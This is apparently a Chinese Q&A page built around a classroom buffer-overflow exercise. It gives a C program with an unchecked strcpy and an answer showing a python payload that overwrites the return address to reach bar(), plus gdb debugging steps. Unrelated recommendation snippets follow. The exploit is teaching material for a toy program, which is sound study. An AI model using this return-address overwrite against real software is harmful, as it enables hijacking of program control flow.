第一题:对于下面的C语言程序,通过调试,给出适当的输入,使得bar函数能够得到执行。要求给出调试过程的界面。 #include <stdio.h> #include <string.h> void foo(const char* input) { char buf[10]; printf(“My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n”); strcpy(buf,input); printf(“%s\n”,buf); printf(“Now the stack looks like :\n%p\n%p\n%p\n%p\n%p\n%p\n\n”); } void bar(void) { printf(“Augh! I’ve been hacked!\n”); } int main(int argc, char* argv[]) { printf(“Address of foo=%p\n”,foo); printf(“Address of bar=%p\n”,bar); if(argc!=2) { printf(“Please supply a string as an argument!\n”); return -1; } foo(argv[1]); return 0; }

时间: 2023-11-29 07:05:30 浏览: 28
这是一道典型的栈溢出漏洞题目。我们需要构造一个特殊的输入,让程序在执行foo函数时发生栈溢出,从而达到执行bar函数的目的。 首先,我们需要了解程序中的漏洞点:foo函数中的strcpy函数没有对输入参数做边界检查,当输入参数长度超过buf数组的长度时,就会发生栈溢出。因此,我们需要构造一个长度大于10的字符串作为输入参数。 其次,我们需要知道bar函数的地址,以便在栈溢出时将程序控制流转移到bar函数。我们可以在程序运行时,通过打印foo和bar函数的地址来获取bar函数的地址,如下所示: ``` $ ./program Address of foo=0x80484f4 Address of bar=0x804851b ``` 最后,我们可以构造以下输入参数,其中包含bar函数的地址,以及一些无意义的填充字符: ``` $ ./program $(python -c 'print "A"*14 + "\x1b\x85\x04\x08"') ``` 其中,"\x1b\x85\x04\x08"是bar函数的地址,它需要以little-endian的形式进行输入。我们还需要在输入参数前面添加14个"A"字符,使得输入参数的长度大于buf数组的长度10。 接下来,我们可以在gdb中调试程序,观察栈的变化,以及程序控制流的转移情况。具体步骤如下: 1. 启动gdb,并设置断点: ``` $ gdb program (gdb) break foo ``` 2. 运行程序,并输入构造好的输入参数: ``` (gdb) run $(python -c 'print "A"*14 + "\x1b\x85\x04\x08"') ``` 3. 在 foo 函数中打印栈的内容,以便观察是否发生了栈溢出: ``` (gdb) print $ebp (gdb) x/20x $esp ``` 如果发现在栈上的输入参数后面出现了 bar 函数的地址,那么说明我们构造的输入参数已经成功地触发了栈溢出漏洞,并且程序控制流已经被转移到了 bar 函数。

相关推荐

最新推荐

recommend-type

C语言程序设计+研究生复试+求职+面试题

汇总了计算机研究生复试有关C语言程序设计各章节简答题,使用了易于口头表达的语言进行了总结。包括C语言程序设计基本概念及各章节问题回答。可供研究生复试或相关专业岗位面试使用。如: 简述C语⾔采取了哪些措施提...
recommend-type

C语言程序设计 现代方法 第二版 习题答案 C Programming: A Modern Approach

C语言经典之作,被誉为“近10年来最好的一部C语言著作” 哈佛、麻省理工、斯坦福、加州伯克利分校、耶鲁等诸多名校计算机专业教材 内容全面,覆盖C99标准,提供了对所有C99库函数的参考 精心选择的近500道习题,贴近...
recommend-type

单片机C语言程序设计:定时器控制数码管动态显示

名称:定时器控制数码管动态显示 说明:8 个数码管上分两组动态显示年月日与时分秒,本例的位显示延时用定时器实现。
recommend-type

C语言的inline内联函数的作用

在调用处将函数展开,减少了调用函数时进栈和出栈的次数,坏处是会增加代码段的大小(缺点:增加了编译后的二进制文件的大小),为了提高运行的速度,对于一些程序代码小,运行时间短但利用次数比较多的函数我们就...
recommend-type

单片机C语言程序设计:8X8LED 点阵显示数字

名称:按键控制 8X8LED 点阵屏显示图形 说明:每次按下 K1 时,会使 8X8LED点阵屏循环显示不同图形。本例同时使用外部中断和定时中断。
recommend-type

zigbee-cluster-library-specification

最新的zigbee-cluster-library-specification说明文档。
recommend-type

管理建模和仿真的文件

管理Boualem Benatallah引用此版本:布阿利姆·贝纳塔拉。管理建模和仿真。约瑟夫-傅立叶大学-格勒诺布尔第一大学,1996年。法语。NNT:电话:00345357HAL ID:电话:00345357https://theses.hal.science/tel-003453572008年12月9日提交HAL是一个多学科的开放存取档案馆,用于存放和传播科学研究论文,无论它们是否被公开。论文可以来自法国或国外的教学和研究机构,也可以来自公共或私人研究中心。L’archive ouverte pluridisciplinaire
recommend-type

MATLAB结构体与对象编程:构建面向对象的应用程序,提升代码可维护性和可扩展性

![MATLAB结构体与对象编程:构建面向对象的应用程序,提升代码可维护性和可扩展性](https://picx.zhimg.com/80/v2-8132d9acfebe1c248865e24dc5445720_1440w.webp?source=1def8aca) # 1. MATLAB结构体基础** MATLAB结构体是一种数据结构,用于存储和组织相关数据。它由一系列域组成,每个域都有一个名称和一个值。结构体提供了对数据的灵活访问和管理,使其成为组织和处理复杂数据集的理想选择。 MATLAB中创建结构体非常简单,使用struct函数即可。例如: ```matlab myStruct
recommend-type

详细描述一下STM32F103C8T6怎么与DHT11连接

STM32F103C8T6可以通过单总线协议与DHT11连接。连接步骤如下: 1. 将DHT11的VCC引脚连接到STM32F103C8T6的5V电源引脚; 2. 将DHT11的GND引脚连接到STM32F103C8T6的GND引脚; 3. 将DHT11的DATA引脚连接到STM32F103C8T6的GPIO引脚,可以选择任一GPIO引脚,需要在程序中配置; 4. 在程序中初始化GPIO引脚,将其设为输出模式,并输出高电平,持续至少18ms,以激活DHT11; 5. 将GPIO引脚设为输入模式,等待DHT11响应,DHT11会先输出一个80us的低电平,然后输出一个80us的高电平,
recommend-type

JSBSim Reference Manual

JSBSim参考手册,其中包含JSBSim简介,JSBSim配置文件xml的编写语法,编程手册以及一些应用实例等。其中有部分内容还没有写完,估计有生之年很难看到完整版了,但是内容还是很有参考价值的。